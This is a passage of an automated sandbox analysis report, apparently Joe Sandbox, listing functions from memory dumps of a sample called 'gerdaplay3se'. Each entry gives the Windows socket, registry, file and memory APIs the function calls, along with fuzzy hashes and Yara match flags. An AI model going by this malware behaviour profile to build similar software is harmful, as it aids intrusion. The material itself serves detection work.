                                                                                  • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D6CD16
                                                                                  • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D6CD1D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$_mallocstd::exception::exception
                                                                                  • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                  • API String ID: 1953324306-412195191
                                                                                  • Opcode ID: 722063e8390fe835a36313dd7bf27b7d970719058fc8b368bb1e65cd261eb52b
                                                                                  • Instruction ID: d92c50a4be64f4d3a3137d0f4b78e333a4a8175744feb54d04175a380b7af98d
                                                                                  • Opcode Fuzzy Hash: 722063e8390fe835a36313dd7bf27b7d970719058fc8b368bb1e65cd261eb52b
                                                                                  • Instruction Fuzzy Hash: A221A0B1E142489BDB04EFE8E848AFDBBB6EF15704F00414DE845A7380DB709E44CBA0
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D62AEA
                                                                                  • connect.WS2_32(?,?,?), ref: 02D62AF5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastconnect
                                                                                  • String ID: 3'
                                                                                  • API String ID: 374722065-280543908
                                                                                  • Opcode ID: b61ecb984499699446706fe15d7a5d4faf958484ce996a1889b79709779b101f
                                                                                  • Instruction ID: 684936b9410e823f8b5de0e12adddad352709f078f7a3958cf5c2692872d9c15
                                                                                  • Opcode Fuzzy Hash: b61ecb984499699446706fe15d7a5d4faf958484ce996a1889b79709779b101f
                                                                                  • Instruction Fuzzy Hash: 34219874D041059BDF10AFA8C40C6BDBBBAEF44325F104559DC1997380EB749D018FA1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: ca4ffa3eef8dbc17113a5fd3d09d40a07a8047be0a0664934bd07af1368be9a3
                                                                                  • Instruction ID: cc2eebf07652a42b83b67c52ddc9b353a8fcefaf9b47b76d770ac5d9ca6d27e0
                                                                                  • Opcode Fuzzy Hash: ca4ffa3eef8dbc17113a5fd3d09d40a07a8047be0a0664934bd07af1368be9a3
                                                                                  • Instruction Fuzzy Hash: 84513AB1904246DFCB48DF68D445AAABBB1FF08720F10819EE8699B380D774ED10CFA1
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 02D636A7
                                                                                    • Part of subcall function 02D62420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D62432
                                                                                    • Part of subcall function 02D62420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D62445
                                                                                    • Part of subcall function 02D62420: RtlEnterCriticalSection.NTDLL(?), ref: 02D62454
                                                                                    • Part of subcall function 02D62420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62469
                                                                                    • Part of subcall function 02D62420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D62470
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1601054111-0
                                                                                  • Opcode ID: cfd7478dc4781311d9e96b13e86be2dc7a3c7aed38fb2f2e125024c573410dbf
                                                                                  • Instruction ID: 357ba5ec3077072a118b8b20f1fae53ca207d354e37eb37100fefa28c50fdec8
                                                                                  • Opcode Fuzzy Hash: cfd7478dc4781311d9e96b13e86be2dc7a3c7aed38fb2f2e125024c573410dbf
                                                                                  • Instruction Fuzzy Hash: 2311C1B5100209ABEF219E54DC89FBA3BAAEF10B54F204456FD528A390C734EC60CBA4
                                                                                  APIs
                                                                                  • __beginthreadex.LIBCMT ref: 02D72046
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D6A8C0,00000000), ref: 02D72077
                                                                                  • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D6A8C0,00000000), ref: 02D72085
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleResumeThread__beginthreadex
                                                                                  • String ID:
                                                                                  • API String ID: 1685284544-0
                                                                                  • Opcode ID: 06bc212cf6fbe01f09f1e6aeda8232c8c39753ea095aa1151e25b2eab2812c23
                                                                                  • Instruction ID: 3f470a2cd2d31e6b01b992f3121d7a2c5b573fffc84462d3f42677b8a7dce018
                                                                                  • Opcode Fuzzy Hash: 06bc212cf6fbe01f09f1e6aeda8232c8c39753ea095aa1151e25b2eab2812c23
                                                                                  • Instruction Fuzzy Hash: 38F0C270240201ABEB209E6CDC84F91B3E8EF48324F34056AF558D7390D375EC92DAA0
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(02D9727C), ref: 02D61ABA
                                                                                  • WSAStartup.WS2_32(00000002,00000000), ref: 02D61ACB
                                                                                  • InterlockedExchange.KERNEL32(02D97280,00000000), ref: 02D61AD7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$ExchangeIncrementStartup
                                                                                  • String ID:
                                                                                  • API String ID: 1856147945-0
                                                                                  • Opcode ID: 9d092d55a165ffa465eea8c33cfed983d8f4c8838588c398004e81eaf25674f8
                                                                                  • Instruction ID: 1f29ed4ccf322c4b4fd173fbecfa3dd099ac960a2c80991c70a06867aec76fed
                                                                                  • Opcode Fuzzy Hash: 9d092d55a165ffa465eea8c33cfed983d8f4c8838588c398004e81eaf25674f8
                                                                                  • Instruction Fuzzy Hash: 71D017759B42045BF62066A0AD0EAB8B72CE705B11F200651FC6AC13C0EA516D2885A6
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(?), ref: 02DFB34D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D9A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D9A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d9a000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID: #rZ*
                                                                                  • API String ID: 823142352-1599676410
                                                                                  • Opcode ID: b8aa41df4191c2ff839fd72e7d5db4d2a1b1ccaf9709ecb315b5a850be0fd349
                                                                                  • Instruction ID: 8798548e8d6fa2ee09350672e9f4bacf64f928defc4db87ed67495582fd2e191
                                                                                  • Opcode Fuzzy Hash: b8aa41df4191c2ff839fd72e7d5db4d2a1b1ccaf9709ecb315b5a850be0fd349
                                                                                  • Instruction Fuzzy Hash: 2451D1F360C704AFE7157E29EC85BBEBBD8EB94320F56062DE7C583741EA3558008696
                                                                                  APIs
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040B4E4
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040B225
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                  • API String ID: 71445658-2036018995
                                                                                  • Opcode ID: 2d5df7d603607d83e32ea2335fe1407f5733ee9528a5b9de8f12e11e9caffe9b
                                                                                  • Instruction ID: f16a4debd6cc5e3d1dbfd8abfc7b9284dcc8268b12d4951e383af56c0e44f276
                                                                                  • Opcode Fuzzy Hash: 2d5df7d603607d83e32ea2335fe1407f5733ee9528a5b9de8f12e11e9caffe9b
                                                                                  • Instruction Fuzzy Hash: E0D0223030C102E6D7004AA0A8093767354E700390F300E33D603F00C1E3BD880AA1AF
                                                                                  APIs
                                                                                  • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040B6C9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID: Common AppData
                                                                                  • API String ID: 3660427363-2574214464
                                                                                  • Opcode ID: c55fb4e1a784324d5c4b3e7555b2ea64966d792e9b16d82899e36bc418aedae3
                                                                                  • Instruction ID: 17a911c67b51cd0d4472802b1d1215ce876cf38fed415aecc2b2386cedade105
                                                                                  • Opcode Fuzzy Hash: c55fb4e1a784324d5c4b3e7555b2ea64966d792e9b16d82899e36bc418aedae3
                                                                                  • Instruction Fuzzy Hash: 2EC08C70D48106FEC7104F204E88A7E7A7CBA447403214D37E813B20C0C7BA0002BA2F
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D64BF2
                                                                                    • Part of subcall function 02D61BA7: __EH_prolog.LIBCMT ref: 02D61BAC
                                                                                    • Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61BBC
                                                                                    • Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61BEA
                                                                                    • Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61C13
                                                                                    • Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61C56
                                                                                    • Part of subcall function 02D6E02F: __EH_prolog.LIBCMT ref: 02D6E034
                                                                                    • Part of subcall function 02D6E02F: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D6E0B3
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D64CF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                  • String ID:
                                                                                  • API String ID: 1927618982-0
                                                                                  • Opcode ID: 72692c8b53d5d342611d947dabdd6626bc1573b957cb69d22f9d8b54dc053886
                                                                                  • Instruction ID: 50c97488f246215a6af89a6f63954bd2abe5b47b3ea261d5c7ce1f6e87c04d9e
                                                                                  • Opcode Fuzzy Hash: 72692c8b53d5d342611d947dabdd6626bc1573b957cb69d22f9d8b54dc053886
                                                                                  • Instruction Fuzzy Hash: FD512775D04248DFDB15DFA8D888AEEBBB5EF18314F14806AE905AB351E7709E44CF60
                                                                                  APIs
                                                                                  • lstrcat.KERNEL32(03426F7D), ref: 02DA294A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D9A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D9A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d9a000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcat
                                                                                  • String ID: ++{
                                                                                  • API String ID: 4038537762-3155876417
                                                                                  • Opcode ID: d508effd01a1226d8fb01efeaa56b55baf0f812d402f04acd7571699832ad2c9
                                                                                  • Instruction ID: 20ba6b8d6026980ec4c2cd48e8cdead78b160b50705745286b4f9267170a5389
                                                                                  • Opcode Fuzzy Hash: d508effd01a1226d8fb01efeaa56b55baf0f812d402f04acd7571699832ad2c9
                                                                                  • Instruction Fuzzy Hash: A4318DB290C614AFD7157F09DC8577AF7E8EF94320F1A082EEAD987300E6759C508B96
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D62D47
                                                                                  • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D62D5C
                                                                                    • Part of subcall function 02D6A440: WSAGetLastError.WS2_32(00000000,?,?,02D62A51), ref: 02D6A44E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$Send
                                                                                  • String ID:
                                                                                  • API String ID: 1282938840-0
                                                                                  • Opcode ID: c2a471ab7ee500478034927c711d8a48f0fd6071bdefd240367d93a976fe377d
                                                                                  • Instruction ID: f3664649cd201afc53300510a8fb7b2750a004d11716172530602fcd5642e951
                                                                                  • Opcode Fuzzy Hash: c2a471ab7ee500478034927c711d8a48f0fd6071bdefd240367d93a976fe377d
                                                                                  • Instruction Fuzzy Hash: EE0121B5904205EFD7205FA5C84897BBBEDFB45365B20452EE89993340EB749D10CBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d3902f0929868f52f6b83a53faaf5a38de1e7956c54c563d39ba77ae17a9c35b
                                                                                  • Instruction ID: 8bfbd58a044552f4b9e8c5aa7f60dcb48bc0ac5b18c7ddd0a1e1a4d068a8d1d1
                                                                                  • Opcode Fuzzy Hash: d3902f0929868f52f6b83a53faaf5a38de1e7956c54c563d39ba77ae17a9c35b
                                                                                  • Instruction Fuzzy Hash: DA01D17084C101FEDB15AFA18E5CABE3724E910701331453BD803B12D1D7BC8A12A69F
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D6833E
                                                                                  • shutdown.WS2_32(?,00000002), ref: 02D68347
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastshutdown
                                                                                  • String ID:
                                                                                  • API String ID: 1920494066-0
                                                                                  • Opcode ID: 563d45eb4a99d6c7f1934e24f46eafb52384a1d1526a5eac98a92dc116b1fa0f
                                                                                  • Instruction ID: eaea064ac1e687da28e8d44a883d36b305dad2e32f05d735f064e7aafda5c22a
                                                                                  • Opcode Fuzzy Hash: 563d45eb4a99d6c7f1934e24f46eafb52384a1d1526a5eac98a92dc116b1fa0f
                                                                                  • Instruction Fuzzy Hash: 70F03075A44314CFD7109F58D809B6AB7E5FF49321F148859E9AAD7380E734AC10CBA2
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                                    • Part of subcall function 004038A8: GetVersionExA.KERNEL32 ref: 004038C7
                                                                                  • HeapDestroy.KERNEL32 ref: 00403A40
                                                                                    • Part of subcall function 00403DC7: HeapAlloc.KERNEL32(00000000,00000140,00403A29,000003F8), ref: 00403DD4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2507506473-0
                                                                                  • Opcode ID: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                                  • Instruction ID: 5dadef9d12e489db140da5c14b34350ea54a5b880f3286d9e4ff1a1591b79aa3
                                                                                  • Opcode Fuzzy Hash: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                                  • Instruction Fuzzy Hash: 04F065707553016ADB24EF705E4676B3DD8AB80B53F10443BF541F41E0EB7C8690991A
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000), ref: 0040B01F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: D*X
                                                                                  • API String ID: 4275171209-1444360580
                                                                                  • Opcode ID: be1b60655502a77b438630a159cfee42b780d1365d365f0ee256d249edeebfcc
                                                                                  • Instruction ID: 674bc1e357348befb5f5fc749722f203f51b8d7df494d28343854b05007eaf87
                                                                                  • Opcode Fuzzy Hash: be1b60655502a77b438630a159cfee42b780d1365d365f0ee256d249edeebfcc
                                                                                  • Instruction Fuzzy Hash: 95C012319045229BC6104B51494566B3EA4EB04795F210023661777590C3340855E7DE
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEvent
                                                                                  • String ID:
                                                                                  • API String ID: 2624557715-0
                                                                                  • Opcode ID: 1d40515ab81c1b4ce9161d0b62d2b317b993b1fd18fa1490a0364b441aac4561
                                                                                  • Instruction ID: 6f1d786c59d975fdae9e5444acb986478cecb304cabaf29a0616b0b08fc8c14e
                                                                                  • Opcode Fuzzy Hash: 1d40515ab81c1b4ce9161d0b62d2b317b993b1fd18fa1490a0364b441aac4561
                                                                                  • Instruction Fuzzy Hash: 20B0923144C001EFC6405BA0EF4C42A3AA9B6093013210031A307700A0C7351021EB1E
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6511E
                                                                                    • Part of subcall function 02D63D7E: htons.WS2_32(?), ref: 02D63DA2
                                                                                    • Part of subcall function 02D63D7E: htonl.WS2_32(00000000), ref: 02D63DB9
                                                                                    • Part of subcall function 02D63D7E: htonl.WS2_32(00000000), ref: 02D63DC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonl$H_prologhtons
                                                                                  • String ID:
                                                                                  • API String ID: 4039807196-0
                                                                                  • Opcode ID: f8f2ad17d827019e4563cae2e953380032b42e0e079de487432fdaf11eac9580
                                                                                  • Instruction ID: 64427dc7ce571648951df18ce467fff5a5fed8daf3fc0d3b6d98732de226b8f0
                                                                                  • Opcode Fuzzy Hash: f8f2ad17d827019e4563cae2e953380032b42e0e079de487432fdaf11eac9580
                                                                                  • Instruction Fuzzy Hash: 698124B1D0424A8FCF05DFA8E094AEEBBB5EF48210F14819AD855B7340EB356A49CF74
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6E8FD
                                                                                    • Part of subcall function 02D61A01: TlsGetValue.KERNEL32 ref: 02D61A0A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prologValue
                                                                                  • String ID:
                                                                                  • API String ID: 3700342317-0
                                                                                  • Opcode ID: d756ac463005f617aac705bf8bbc24b3f9c12311caee444bc4c4e0d9ebcaa535
                                                                                  • Instruction ID: 184abf255d33867be6a91f60a25f76970abea044072a35552eb8fcd56afa0c8e
                                                                                  • Opcode Fuzzy Hash: d756ac463005f617aac705bf8bbc24b3f9c12311caee444bc4c4e0d9ebcaa535
                                                                                  • Instruction Fuzzy Hash: 5A213BB690420AAFDB00DFA4D444AFEBBF9EF49310F14812AE918A7340D771AD01CBB1
                                                                                  APIs
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D633CC
                                                                                    • Part of subcall function 02D632AB: __EH_prolog.LIBCMT ref: 02D632B0
                                                                                    • Part of subcall function 02D632AB: RtlEnterCriticalSection.NTDLL(?), ref: 02D632C3
                                                                                    • Part of subcall function 02D632AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D632EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                  • String ID:
                                                                                  • API String ID: 1518410164-0
                                                                                  • Opcode ID: 321693a88cc245e3bafba647e25668c00f7ac7787f342ca95d39e9c935e3162e
                                                                                  • Instruction ID: b53e0f585e14d3b9b094a4a6993abbf93d1b269d10bb34932147f4244047c647
                                                                                  • Opcode Fuzzy Hash: 321693a88cc245e3bafba647e25668c00f7ac7787f342ca95d39e9c935e3162e
                                                                                  • Instruction Fuzzy Hash: 79016170214606AFD7048F59D889F65B7A9FF44320F24835AE868873C0EB30EC11CBA0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6E48D
                                                                                    • Part of subcall function 02D626DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D62706
                                                                                    • Part of subcall function 02D626DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D6272B
                                                                                    • Part of subcall function 02D626DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D85A93), ref: 02D62738
                                                                                    • Part of subcall function 02D626DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D62778
                                                                                    • Part of subcall function 02D626DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D627D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                  • String ID:
                                                                                  • API String ID: 4293676635-0
                                                                                  • Opcode ID: fa325516c52515d7c105be846d234b0c03c6433938dc1d7de74e8c40ffd35945
                                                                                  • Instruction ID: b2f56e0c54d8989cfc77c5fcef4595ce2602b92089c497b0636e2d1908f50ee4
                                                                                  • Opcode Fuzzy Hash: fa325516c52515d7c105be846d234b0c03c6433938dc1d7de74e8c40ffd35945
                                                                                  • Instruction Fuzzy Hash: 2001D0B0910B048FC718DF5AC544986FBF5EF88310B05C5AE94498B761E370DA40CFA0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 4312c6114a202acfc17eefa4afbc658a93dcc948a6679b20c1be7a6e01a81c79
                                                                                  • Instruction ID: 55e69cf7c3205d098075f1ef4c4825cc47ed66c09711a6d4786e40eacee8f8a0
                                                                                  • Opcode Fuzzy Hash: 4312c6114a202acfc17eefa4afbc658a93dcc948a6679b20c1be7a6e01a81c79
                                                                                  • Instruction Fuzzy Hash: 52D0927278D115EAD55005986EAEA77624CE78839AB340833A207B61C182FE8446A1AF
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6E26C
                                                                                    • Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7
                                                                                    • Part of subcall function 02D6E488: __EH_prolog.LIBCMT ref: 02D6E48D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 4254904621-0
                                                                                  • Opcode ID: 52eb48d2b86f141bf39dbdac1c8576da31b900b326c17a4143ae813f64e615d6
                                                                                  • Instruction ID: 73c0f14f6e7fd9ccaec50b2620485379fa9f4a2ce5b7ef4dc9774c11399e3f36
                                                                                  • Opcode Fuzzy Hash: 52eb48d2b86f141bf39dbdac1c8576da31b900b326c17a4143ae813f64e615d6
                                                                                  • Instruction Fuzzy Hash: A3E0CD70A051055BDF0DEFA8E80177D7766DB08300F00416DB408D2740DB70DD008A60
                                                                                  APIs
                                                                                    • Part of subcall function 02D75B9A: __getptd_noexit.LIBCMT ref: 02D75B9B
                                                                                    • Part of subcall function 02D75B9A: __amsg_exit.LIBCMT ref: 02D75BA8
                                                                                    • Part of subcall function 02D733D6: __getptd_noexit.LIBCMT ref: 02D733DA
                                                                                    • Part of subcall function 02D733D6: __freeptd.LIBCMT ref: 02D733F4
                                                                                    • Part of subcall function 02D733D6: RtlExitUserThread.NTDLL(?,00000000,?,02D733B6,00000000), ref: 02D733FD
                                                                                  • __XcptFilter.LIBCMT ref: 02D733C2
                                                                                    • Part of subcall function 02D78CD4: __getptd_noexit.LIBCMT ref: 02D78CD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
